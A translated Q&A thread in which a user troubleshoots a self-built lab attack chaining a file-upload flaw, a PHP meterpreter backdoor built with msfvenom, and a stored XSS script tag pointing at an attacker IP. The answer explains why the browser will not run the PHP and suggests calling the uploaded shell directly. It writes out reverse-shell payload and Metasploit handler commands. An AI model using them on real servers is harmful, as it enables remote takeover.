首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >存储XSS + PHP后门+文件上传漏洞

存储XSS + PHP后门+文件上传漏洞
EN

Security用户
提问于 2019-07-19 09:49:39
回答 1查看 4.8K关注 0票数 4

我构建了这个web应用程序(使用PHP5+ MySQL),可以利用文件上传漏洞和XSS。

我的攻击路线是:

  1. 上传我用msfvenom构建的PHP后门
  2. 转到另一个具有XSS漏洞的页面。
  3. <"script src="ATTACKING IP:PORT443/phpbackdoor.php"></script>作为输入
  4. 打开听者/计量器

这4个步骤似乎正在工作,但一旦创建了米预会话,我甚至无法生成shell或执行任何命令(例如sysinfo );我使用的是最新的Kali更新。

我的目标框是Ubuntu16.04,web应用程序正在LAMPP或只是本地主机上运行。

我的NAT是打开的,但是两个端口443都是在两台虚拟机上打开的。

下面是我用来按顺序构建有效载荷和命令的方法:

代码语言:javascript
复制
msfvenom -p php/meterpreter_reverse_tcp LHOST=attacking ip LPORT=443 -f raw > shell.php
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost attacking ip
set lport 443
exploit

有东西弄坏了计量器,我无法指出它是什么。

EN

回答 1

Security用户

回答已采纳

发布于 2019-07-19 10:30:39

因为当您执行此<"script src="ATTACKING IP:PORT443/phpbackdoor.php"></script>时,文件根本不会在服务器端执行,而是由受害者浏览器执行,当然它不会工作-- PHP file.The浏览器查找javascript,例如,尝试和PHP回显“有效的JAVASCRIPT”,如果您可以上传PHP,您更愿意通过直接访问链接https://example.com/shell.php或其他一些漏洞(如PHP文件包含)来执行该文件。

简而言之,上传到服务器端的shell不会以这种方式执行。

票数 5
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/213772

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档